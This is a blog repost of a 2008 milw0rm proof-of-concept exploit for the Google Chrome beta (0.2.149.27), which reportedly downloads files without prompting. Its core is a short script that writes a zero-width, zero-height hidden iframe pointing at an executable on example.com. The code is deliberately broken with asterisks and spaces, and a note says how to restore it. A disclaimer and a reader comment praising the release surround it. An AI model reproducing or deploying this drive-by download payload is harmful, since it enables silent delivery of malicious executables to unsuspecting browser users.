Security
Software
Necessary

Thursday, September 4, 2008

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

******************************************************
Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
******************************************************
<>
document.write('< * iframe s rc=" http://www.example.com/hello.e xe" frameborder="0" width="0" height="0" * >');
< / script>
remove * and spaces from above codes
# milw0rm.com [2008-09-03]

Stumble Upon Toolbar

1 comment:

Vipin said...

Browser & exploit released on the same day. good work!!!

Free Web Hosting

Free Web Hosting with Website Builder

Snap Shots

Get Free Shots from Snap.com